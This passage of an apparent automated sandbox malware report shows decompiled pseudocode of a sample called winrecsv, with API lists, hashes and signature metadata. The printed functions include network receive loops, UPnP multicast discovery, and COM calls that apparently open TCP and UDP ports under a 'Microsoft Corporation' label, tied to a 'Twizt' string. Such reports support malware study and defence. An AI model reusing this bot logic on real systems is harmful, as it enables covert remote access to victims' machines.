                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: File$ChangeCloseCreateFindNotificationSize
                                                                                  • String ID: P@
                                                                                  • API String ID: 4178644524-676759640
                                                                                  • Opcode ID: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction ID: ef73fbcfdb561ef279eb64d7b78e57dedde01b6ae7d936de3e3fbaf211c6e608
                                                                                  • Opcode Fuzzy Hash: bc44828a6da30a9cad1c5fe3b81ddf2eba58198aecc4cfa5820a2fec73a274a6
                                                                                  • Instruction Fuzzy Hash: A5F01C74A40308FBDB20DFA4DC49F9D7BB4AB08711F208294FA447B2C0D6B56A808B48
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 64%
                                                                                  			E0040DE70(char* __edx, intOrPtr _a4) {
                                                                                  				short _v18;
                                                                                  				short _v22;
                                                                                  				short _v26;
                                                                                  				short _v28;
                                                                                  				short _v30;
                                                                                  				char _v32;
                                                                                  				char _v36;
                                                                                  				intOrPtr _v40;
                                                                                  				intOrPtr _v44;
                                                                                  				char _v56;
                                                                                  				intOrPtr _v68;
                                                                                  				char* _t23;
                                                                                  				short _t26;
                                                                                  				long _t29;
                                                                                  				short _t34;
                                                                                  				intOrPtr _t37;
                                                                                  				intOrPtr _t43;
                                                                                  				long _t47;
                                                                                  				signed int _t48;
                                                                                  				void* _t50;
                                                                                  
                                                                                  				_t40 = __edx;
                                                                                  				_t50 = (_t48 & 0xfffffff8) - 0x1c;
                                                                                  				_t34 = 0;
                                                                                  				_t43 = _a4;
                                                                                  				_v28 = 0;
                                                                                  				do {
                                                                                  					_t23 =  &_v32;
                                                                                  					_v32 = 0;
                                                                                  					__imp__#10( *(_t43 + 8), 0x4004667f, _t23); // executed
                                                                                  					if(_t23 == 0xffffffff) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_t37 = _v44;
                                                                                  					if(_t37 != 0) {
                                                                                  						if(_t34 == 0 || _v40 < _t37) {
                                                                                  							_v40 = _t37;
                                                                                  							_t26 = E00408EA0(_t37, _t40, _t34, _t37);
                                                                                  							_t37 = _v44;
                                                                                  							_t50 = _t50 + 8;
                                                                                  							_t34 = _t26;
                                                                                  						}
                                                                                  						_v30 = 0;
                                                                                  						_v26 = 0;
                                                                                  						_v22 = 0;
                                                                                  						_v18 = 0;
                                                                                  						_t29 =  *(_t43 + 8);
                                                                                  						_v32 = 0;
                                                                                  						_t40 =  &_v32;
                                                                                  						_v36 = 0x10;
                                                                                  						__imp__#17(_t29, _t34, _t37, 0,  &_v32,  &_v36);
                                                                                  						_t47 = _t29;
                                                                                  						if(_t47 != 0xffffffff && _t47 != 0) {
                                                                                  							InterlockedExchangeAdd(_t43 + 0x18, _t47);
                                                                                  							_t40 =  &_v56;
                                                                                  							E0040DD40(_t43, _t34, _t47, _v68,  &_v56);
                                                                                  							_t50 = _t50 + 0x14;
                                                                                  						}
                                                                                  					}
                                                                                  				} while (WaitForSingleObject( *(_t43 + 0x10), 1) == 0x102);
                                                                                  				return E00408FB0(_t34);
                                                                                  			}























                                                                                  0x0040de70
                                                                                  0x0040de76
                                                                                  0x0040de7b
                                                                                  0x0040de7e
                                                                                  0x0040de81
                                                                                  0x0040de85
                                                                                  0x0040de88
                                                                                  0x0040de93
                                                                                  0x0040de9b
                                                                                  0x0040dea4
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040deaa
                                                                                  0x0040deb0
                                                                                  0x0040deb8
                                                                                  0x0040dec2
                                                                                  0x0040dec6
                                                                                  0x0040decb
                                                                                  0x0040decf
                                                                                  0x0040ded2
                                                                                  0x0040ded2
                                                                                  0x0040ded8
                                                                                  0x0040dedc
                                                                                  0x0040dee0
                                                                                  0x0040dee4
                                                                                  0x0040deee
                                                                                  0x0040def1
                                                                                  0x0040def6
                                                                                  0x0040df00
                                                                                  0x0040df08
                                                                                  0x0040df0e
                                                                                  0x0040df13
                                                                                  0x0040df1e
                                                                                  0x0040df28
                                                                                  0x0040df31
                                                                                  0x0040df36
                                                                                  0x0040df36
                                                                                  0x0040df13
                                                                                  0x0040df45
                                                                                  0x0040df5f

                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32 ref: 0040DE9B
                                                                                  • recvfrom.WS2_32 ref: 0040DF08
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040DF1E
                                                                                  • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040DF3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                  • String ID:
                                                                                  • API String ID: 3980219359-0
                                                                                  • Opcode ID: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction ID: 6c80b279ed5ca581be7c80171f6d45ff8cd2583a00b65cb27f0af65c826a2fd4
                                                                                  • Opcode Fuzzy Hash: 417089ecdd77fb733dbf3dacbd9a690ae54b466f088ab91cb1b16bb4ccf47cfd
                                                                                  • Instruction Fuzzy Hash: 252181B1504301AFD304DF65D884A6BB7E9EFD4314F008A3EF859D2280E774D9488BAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 68%
                                                                                  			E00405520(intOrPtr _a4) {
                                                                                  				intOrPtr _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				void* _v24;
                                                                                  				intOrPtr* _v28;
                                                                                  				void* _v32;
                                                                                  				short _v36;
                                                                                  				char _v40;
                                                                                  				intOrPtr _t95;
                                                                                  				void* _t101;
                                                                                  				void* _t103;
                                                                                  				intOrPtr _t110;
                                                                                  				void* _t118;
                                                                                  				void* _t122;
                                                                                  				void* _t199;
                                                                                  				void* _t200;
                                                                                  
                                                                                  				_v28 = 0;
                                                                                  				_v32 = 0;
                                                                                  				_v16 = 0;
                                                                                  				_v12 = 0;
                                                                                  				_v24 = 0;
                                                                                  				_v8 = 0;
                                                                                  				_v20 = 0;
                                                                                  				while(1) {
                                                                                  					_t95 = E004054D0(0x411e90, 0x411ea0); // executed
                                                                                  					_t200 = _t199 + 8;
                                                                                  					_v28 = _t95;
                                                                                  					if(_v28 == 0) {
                                                                                  						break;
                                                                                  					}
                                                                                  					_push( &_v32);
                                                                                  					_push(_v28);
                                                                                  					if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x1c))))() == 0) {
                                                                                  						_t101 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 0x1c))))(_v32,  &_v16); // executed
                                                                                  						if(_t101 == 0) {
                                                                                  							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x20))))(_v16,  &_v36); // executed
                                                                                  							if(_t103 == 0) {
                                                                                  								if(_v36 == 0xffffffff) {
                                                                                  									_push( &_v12);
                                                                                  									_push(_v16);
                                                                                  									if( *((intOrPtr*)( *((intOrPtr*)( *_v16 + 0x50))))() == 0) {
                                                                                  										_push( &_v24);
                                                                                  										_push(_a4);
                                                                                  										_push(_v12);
                                                                                  										if( *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x28))))() != 0) {
                                                                                  											_t110 = E004054D0(0x411eb0, 0x411ec0);
                                                                                  											_t199 = _t200 + 8;
                                                                                  											_v24 = _t110;
                                                                                  											if(_v24 != 0) {
                                                                                  												__imp__#2(L"Microsoft Corporation");
                                                                                  												_v8 = _t110;
                                                                                  												if(_v8 != 0) {
                                                                                  													_push(_v8);
                                                                                  													_push(_v24);
                                                                                  													if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x20))))() == 0) {
                                                                                  														_push(_a4);
                                                                                  														_push(_v24);
                                                                                  														if( *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x28))))() == 0) {
                                                                                  															_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  															if(_t118 == 0) {
                                                                                  																 *((intOrPtr*)( *((intOrPtr*)( *_v12 + 0x20))))(_v12, _v24);
                                                                                  																_t118 = 0;
                                                                                  																if(0 != 0) {
                                                                                  																	continue;
                                                                                  																}
                                                                                  																L34:
                                                                                  																if(_v20 != 0) {
                                                                                  																	_t118 = E00408FB0(_v20);
                                                                                  																}
                                                                                  																if(_v8 != 0) {
                                                                                  																	__imp__#6(_v8);
                                                                                  																}
                                                                                  																if(_v24 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 8))))(_v24);
                                                                                  																}
                                                                                  																if(_v12 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v12 + 8))))(_v12);
                                                                                  																}
                                                                                  																if(_v16 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v16 + 8))))(_v16);
                                                                                  																}
                                                                                  																if(_v32 != 0) {
                                                                                  																	_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v32 + 8))))(_v32);
                                                                                  																}
                                                                                  																if(_v28 == 0) {
                                                                                  																	return _t118;
                                                                                  																} else {
                                                                                  																	_t122 =  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28); // executed
                                                                                  																	return _t122;
                                                                                  																}
                                                                                  															}
                                                                                  															goto L34;
                                                                                  														}
                                                                                  														goto L34;
                                                                                  													}
                                                                                  													goto L34;
                                                                                  												}
                                                                                  												goto L34;
                                                                                  											}
                                                                                  											goto L34;
                                                                                  										}
                                                                                  										_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x44))))(_v24,  &_v36);
                                                                                  										if(_t118 == 0) {
                                                                                  											if(_v36 != 0xffffffff) {
                                                                                  												 *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x48))))(_v24, 0xffffffff);
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  											} else {
                                                                                  												_v40 = 0;
                                                                                  												_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x34))))(_v24,  &_v40);
                                                                                  												if(_t118 == 0 && _v40 != 0) {
                                                                                  													_t118 =  *((intOrPtr*)( *((intOrPtr*)( *_v24 + 0x38))))(_v24, 0);
                                                                                  												}
                                                                                  											}
                                                                                  										}
                                                                                  										goto L34;
                                                                                  									}
                                                                                  									goto L34;
                                                                                  								}
                                                                                  								goto L34;
                                                                                  							}
                                                                                  							goto L34;
                                                                                  						}
                                                                                  						goto L34;
                                                                                  					}
                                                                                  					goto L34;
                                                                                  				}
                                                                                  				goto L34;
                                                                                  			}




















                                                                                  0x00405526
                                                                                  0x0040552d
                                                                                  0x00405534
                                                                                  0x0040553b
                                                                                  0x00405542
                                                                                  0x00405549
                                                                                  0x00405550
                                                                                  0x00405557
                                                                                  0x00405561
                                                                                  0x00405566
                                                                                  0x00405569
                                                                                  0x00405570
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040557a
                                                                                  0x00405583
                                                                                  0x0040558b
                                                                                  0x004055a2
                                                                                  0x004055a6
                                                                                  0x004055bd
                                                                                  0x004055c1
                                                                                  0x004055cf
                                                                                  0x004055d9
                                                                                  0x004055e2
                                                                                  0x004055ea
                                                                                  0x004055f4
                                                                                  0x004055f8
                                                                                  0x00405601
                                                                                  0x00405609
                                                                                  0x00405693
                                                                                  0x00405698
                                                                                  0x0040569b
                                                                                  0x004056a2
                                                                                  0x004056ab
                                                                                  0x004056b1
                                                                                  0x004056b8
                                                                                  0x004056bf
                                                                                  0x004056c8
                                                                                  0x004056d0
                                                                                  0x004056d7
                                                                                  0x004056e0
                                                                                  0x004056e8
                                                                                  0x004056fa
                                                                                  0x004056fe
                                                                                  0x00405712
                                                                                  0x00405714
                                                                                  0x00405716
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040571c
                                                                                  0x00405720
                                                                                  0x00405726
                                                                                  0x0040572b
                                                                                  0x00405732
                                                                                  0x00405738
                                                                                  0x00405738
                                                                                  0x00405742
                                                                                  0x00405750
                                                                                  0x00405750
                                                                                  0x00405756
                                                                                  0x00405764
                                                                                  0x00405764
                                                                                  0x0040576a
                                                                                  0x00405778
                                                                                  0x00405778
                                                                                  0x0040577e
                                                                                  0x0040578c
                                                                                  0x0040578c
                                                                                  0x00405792
                                                                                  0x004057a5
                                                                                  0x00405794
                                                                                  0x004057a0
                                                                                  0x00000000
                                                                                  0x004057a0
                                                                                  0x00405792
                                                                                  0x00000000
                                                                                  0x00405700
                                                                                  0x00000000
                                                                                  0x004056ea
                                                                                  0x00000000
                                                                                  0x004056d2
                                                                                  0x00000000
                                                                                  0x004056ba
                                                                                  0x00000000
                                                                                  0x004056a4
                                                                                  0x0040561b
                                                                                  0x0040561f
                                                                                  0x0040562d
                                                                                  0x00405672
                                                                                  0x00405682
                                                                                  0x0040562f
                                                                                  0x0040562f
                                                                                  0x00405646
                                                                                  0x0040564a
                                                                                  0x00405660
                                                                                  0x00405660
                                                                                  0x00405662
                                                                                  0x00405684
                                                                                  0x00000000
                                                                                  0x0040561f
                                                                                  0x00000000
                                                                                  0x004055ec
                                                                                  0x00000000
                                                                                  0x004055d1
                                                                                  0x00000000
                                                                                  0x004055c3
                                                                                  0x00000000
                                                                                  0x004055a8
                                                                                  0x00000000
                                                                                  0x0040558d
                                                                                  0x00000000

                                                                                  APIs
                                                                                    • Part of subcall function 004054D0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004054F0
                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00405738
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFreeInstanceString
                                                                                  • String ID: Microsoft Corporation
                                                                                  • API String ID: 586785272-3838278685
                                                                                  • Opcode ID: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction ID: b68b7a3bc5298b5c42a29c8e1873351d80abb6d03bdfce163c93a33f9d118317
                                                                                  • Opcode Fuzzy Hash: 9a625b98ebff3c221c1120575af285f8cbbbf93c67dc0beb6ef5e6c09e9c2793
                                                                                  • Instruction Fuzzy Hash: 0991FA75A0050ADFCB04DB98C994AAFB7B5EF88300F208169E505B73A0D739AE41DF69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 82%
                                                                                  			E0040D3D0() {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v12;
                                                                                  				signed int _v16;
                                                                                  				intOrPtr _v20;
                                                                                  				intOrPtr _t20;
                                                                                  				intOrPtr _t26;
                                                                                  				intOrPtr _t31;
                                                                                  				void* _t36;
                                                                                  				void* _t37;
                                                                                  
                                                                                  				__imp__CoInitializeEx(0, 2); // executed
                                                                                  				_v12 = 0;
                                                                                  				_t20 = E0040C930( &_v12,  &_v12); // executed
                                                                                  				_t37 = _t36 + 4;
                                                                                  				_v8 = _t20;
                                                                                  				if(_v8 != 0) {
                                                                                  					_v16 = 0;
                                                                                  					while(_v16 < _v8) {
                                                                                  						_t20 = E0040CFE0( *((intOrPtr*)(_v12 + _v16 * 4)));
                                                                                  						_t37 = _t37 + 4;
                                                                                  						 *0x414e7c = _t20;
                                                                                  						if( *0x414e7c == 0) {
                                                                                  							_v16 = _v16 + 1;
                                                                                  							continue;
                                                                                  						}
                                                                                  						_v20 = E00409880();
                                                                                  						_t31 =  *0x414e7c; // 0x0
                                                                                  						E0040D350(_t31, _t31, "TCP", 0x9e34, _v20);
                                                                                  						_t26 =  *0x414e7c; // 0x0
                                                                                  						_t20 = E0040D350(_t31, _t26, "UDP", 0x9e34, _v20);
                                                                                  						_t37 = _t37 + 0x20;
                                                                                  						break;
                                                                                  					}
                                                                                  					return E004090D0(_t20, _v8, _v12, _v8);
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}












                                                                                  0x0040d3da
                                                                                  0x0040d3e0
                                                                                  0x0040d3eb
                                                                                  0x0040d3f0
                                                                                  0x0040d3f3
                                                                                  0x0040d3fa
                                                                                  0x0040d400
                                                                                  0x0040d412
                                                                                  0x0040d424
                                                                                  0x0040d429
                                                                                  0x0040d42c
                                                                                  0x0040d438
                                                                                  0x0040d40f
                                                                                  0x00000000
                                                                                  0x0040d40f
                                                                                  0x0040d43f
                                                                                  0x0040d450
                                                                                  0x0040d457
                                                                                  0x0040d46d
                                                                                  0x0040d473
                                                                                  0x0040d478
                                                                                  0x00000000
                                                                                  0x0040d478
                                                                                  0x00000000
                                                                                  0x0040d48c
                                                                                  0x0040d492

                                                                                  APIs
                                                                                  • CoInitializeEx.OLE32(00000000,00000002,?,?,?,0040686F), ref: 0040D3DA
                                                                                    • Part of subcall function 0040C930: socket.WS2_32(00000002,00000002,00000011), ref: 0040C94A
                                                                                    • Part of subcall function 0040C930: htons.WS2_32(0000076C), ref: 0040C980
                                                                                    • Part of subcall function 0040C930: inet_addr.WS2_32(239.255.255.250), ref: 0040C98F
                                                                                    • Part of subcall function 0040C930: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040C9AD
                                                                                    • Part of subcall function 0040C930: bind.WS2_32(000000FF,?,00000010), ref: 0040C9E3
                                                                                    • Part of subcall function 0040C930: lstrlenA.KERNEL32(004105A0,00000000,?,00000010), ref: 0040C9FC
                                                                                    • Part of subcall function 0040C930: sendto.WS2_32(000000FF,004105A0,00000000), ref: 0040CA0B
                                                                                    • Part of subcall function 0040C930: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040CA25
                                                                                    • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0BB
                                                                                    • Part of subcall function 0040CFE0: SysFreeString.OLEAUT32(00000000), ref: 0040D0C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                  • String ID: TCP$UDP
                                                                                  • API String ID: 1519345861-1097902612
                                                                                  • Opcode ID: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
                                                                                  • Instruction ID: 198a483ec780ca398c4dd107ec41d4ae9ae4b932ff6ccac9155d2369ff036123
                                                                                  • Opcode Fuzzy Hash: ddc30d4bc63b944d249e95f6100ac757865db89eed3a7b623e3ea16a2adfc62d
                                                                                  • Instruction Fuzzy Hash: 5A11B4B4D00208EBDB00EBE4D845FAE7774BB44304F10856AE511773C2D7796A58CF99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 86%
                                                                                  			E0040BAB0(LONG* _a4, intOrPtr _a8) {
                                                                                  				char _v5;
                                                                                  				intOrPtr _v12;
                                                                                  				signed int _v13;
                                                                                  				char _v20;
                                                                                  				intOrPtr _v24;
                                                                                  				intOrPtr _t38;
                                                                                  				signed char _t43;
                                                                                  				signed char _t48;
                                                                                  				intOrPtr _t49;
                                                                                  				signed char _t53;
                                                                                  				intOrPtr _t72;
                                                                                  				void* _t80;
                                                                                  				void* _t81;
                                                                                  				void* _t84;
                                                                                  
                                                                                  				if(InterlockedExchangeAdd(_a4, 0) == 0) {
                                                                                  					_v5 = 0;
                                                                                  					_t38 = E0040B9C0(_t37, _a4[1]); // executed
                                                                                  					_t81 = _t80 + 4;
                                                                                  					_v12 = _t38;
                                                                                  					if(_v12 == 0xffffffff) {
                                                                                  						L18:
                                                                                  						return _v5;
                                                                                  					}
                                                                                  					InterlockedIncrement(_a4);
                                                                                  					while(1) {
                                                                                  						_t72 =  *0x414e6c; // 0xe9ca09cc
                                                                                  						_t43 = E0040A390(_v12, 0, _t72, 0, _a8, E0040B890, 0);
                                                                                  						_t81 = _t81 + 0x1c;
                                                                                  						_t63 = _t43 & 0x000000ff;
                                                                                  						if((_t43 & 0x000000ff) == 0) {
                                                                                  							break;
                                                                                  						}
                                                                                  						_v13 = 1;
                                                                                  						while((_v13 & 0x000000ff) != 0) {
                                                                                  							_v13 = 0;
                                                                                  							_t48 = E0040B8F0(_v12,  &_v20, 4, 0x2710);
                                                                                  							_t81 = _t81 + 0x10;
                                                                                  							if((_t48 & 0x000000ff) == 0 || _v20 == 0) {
                                                                                  								L15:
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								_t49 = E00408E60(_v20);
                                                                                  								_t81 = _t81 + 4;
                                                                                  								_v24 = _t49;
                                                                                  								if(_v24 != 0) {
                                                                                  									_t53 = E0040B8F0(_v12, _v24, _v20, E0040BA50(_v20));
                                                                                  									_t84 = _t81 + 0x14;
                                                                                  									if((_t53 & 0x000000ff) != 0) {
                                                                                  										E0040A4F0(_v12, _v24, _v20, _a4[1], E0040B890, 0, 0);
                                                                                  										_t84 = _t84 + 0x1c;
                                                                                  										_v13 = 1;
                                                                                  									}
                                                                                  									E00408FB0(_v24);
                                                                                  									_t81 = _t84 + 4;
                                                                                  									goto L15;
                                                                                  								}
                                                                                  								break;
                                                                                  							}
                                                                                  						}
                                                                                  						_v5 = 1;
                                                                                  						if(0 != 0) {
                                                                                  							continue;
                                                                                  						}
                                                                                  						L17:
                                                                                  						InterlockedDecrement(_a4);
                                                                                  						E00409940(_v12);
                                                                                  						goto L18;
                                                                                  					}
                                                                                  					E00409820(_t63, _a4[1]);
                                                                                  					_t81 = _t81 + 4;
                                                                                  					goto L17;
                                                                                  				}
                                                                                  				return 0;
                                                                                  			}

















                                                                                  0x0040bac4
                                                                                  0x0040bacd
                                                                                  0x0040bad8
                                                                                  0x0040badd
                                                                                  0x0040bae0
                                                                                  0x0040bae7
                                                                                  0x0040bc06
                                                                                  0x00000000
                                                                                  0x0040bc06
                                                                                  0x0040baf1
                                                                                  0x0040baf7
                                                                                  0x0040bb04
                                                                                  0x0040bb11
                                                                                  0x0040bb16
                                                                                  0x0040bb19
                                                                                  0x0040bb1e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040bb34
                                                                                  0x0040bb38
                                                                                  0x0040bb44
                                                                                  0x0040bb57
                                                                                  0x0040bb5c
                                                                                  0x0040bb64
                                                                                  0x0040bbdf
                                                                                  0x00000000
                                                                                  0x0040bb6c
                                                                                  0x0040bb70
                                                                                  0x0040bb75
                                                                                  0x0040bb78
                                                                                  0x0040bb7f
                                                                                  0x0040bb9c
                                                                                  0x0040bba1
                                                                                  0x0040bba9
                                                                                  0x0040bbc7
                                                                                  0x0040bbcc
                                                                                  0x0040bbcf
                                                                                  0x0040bbcf
                                                                                  0x0040bbd7
                                                                                  0x0040bbdc
                                                                                  0x00000000
                                                                                  0x0040bbdc
                                                                                  0x00000000
                                                                                  0x0040bb81
                                                                                  0x0040bb64
                                                                                  0x0040bbe4
                                                                                  0x0040bbea
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040bbf0
                                                                                  0x0040bbf4
                                                                                  0x0040bbfe
                                                                                  0x00000000
                                                                                  0x0040bc03
                                                                                  0x0040bb27
                                                                                  0x0040bb2c
                                                                                  0x00000000
                                                                                  0x0040bb2c
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040BABC
                                                                                  • InterlockedIncrement.KERNEL32(000000FF), ref: 0040BAF1
                                                                                  • InterlockedDecrement.KERNEL32(000000FF), ref: 0040BBF4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementExchangeIncrement
                                                                                  • String ID:
                                                                                  • API String ID: 2813130747-0
                                                                                  • Opcode ID: d66568f139b97b9250529c06a7e49fffa48baefe54cd5369e31c2569c1624458
                                                                                  • Instruction ID: 3c78adec81f77e8e7fdd20323f227dc686b9dedf38b32a9f5f72fcc304b9c136
                                                                                  • Opcode Fuzzy Hash: d66568f139b97b9250529c06a7e49fffa48baefe54cd5369e31c2569c1624458
                                                                                  • Instruction Fuzzy Hash: 3241B3B5A00208ABDF00EAA5DC45BAF7774AB44304F04856DF505BB2C2E779EA01C7ED
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 79%
                                                                                  			E0040A1A0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				char _v9;
                                                                                  				intOrPtr _v16;
                                                                                  				intOrPtr _t23;
                                                                                  
                                                                                  				_t23 = E0040ABD0(__ecx); // executed
                                                                                  				 *((intOrPtr*)(_a8 + 4)) = _t23;
                                                                                  				_t4 = _a8 + 0x14; // 0x1023d00
                                                                                  				 *_a8 = E00409180(_a8 + 4,  *_t4 + 0x14);
                                                                                  				_v9 = 0;
                                                                                  				_t9 = _a8 + 0x14; // 0x1023d00
                                                                                  				_v16 =  *_t9 + 0x18;
                                                                                  				_v8 = E0040AE60( *_t9 + 0x18, "Twizt", lstrlenA("Twizt"), _a8, _v16);
                                                                                  				if(_v8 != 0) {
                                                                                  					_v9 = _a12(_a4, _v8, _v16, _a16);
                                                                                  					E00408FB0(_v8);
                                                                                  				}
                                                                                  				return _v9;
                                                                                  			}







                                                                                  0x0040a1a6
                                                                                  0x0040a1ae
                                                                                  0x0040a1b4
                                                                                  0x0040a1cd
                                                                                  0x0040a1cf
                                                                                  0x0040a1d6
                                                                                  0x0040a1dc
                                                                                  0x0040a200
                                                                                  0x0040a207
                                                                                  0x0040a21c
                                                                                  0x0040a223
                                                                                  0x0040a228
                                                                                  0x0040a231

                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(Twizt,0040C329,0040C329,?,?,0040C329,00000000,0040C329,0040C329,00000000,00000000), ref: 0040A1EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.606907194.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000005.00000002.606897136.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000005.00000002.606960359.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_400000_winrecsv.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: lstrlen
                                                                                  • String ID: Twizt$Twizt
                                                                                  • API String ID: 1659193697-16428492
                                                                                  • Opcode ID: d2777426fe4f895c35d30f5f867fe7ea5fb9450d2a450df474408235e216b6ac
                                                                                  • Instruction ID: 51e17fc92645e8ce827fbf7df6250645f897da73d1b61dcc158797575a8342f0
                                                                                  • Opcode Fuzzy Hash: d2777426fe4f895c35d30f5f867fe7ea5fb9450d2a450df474408235e216b6ac
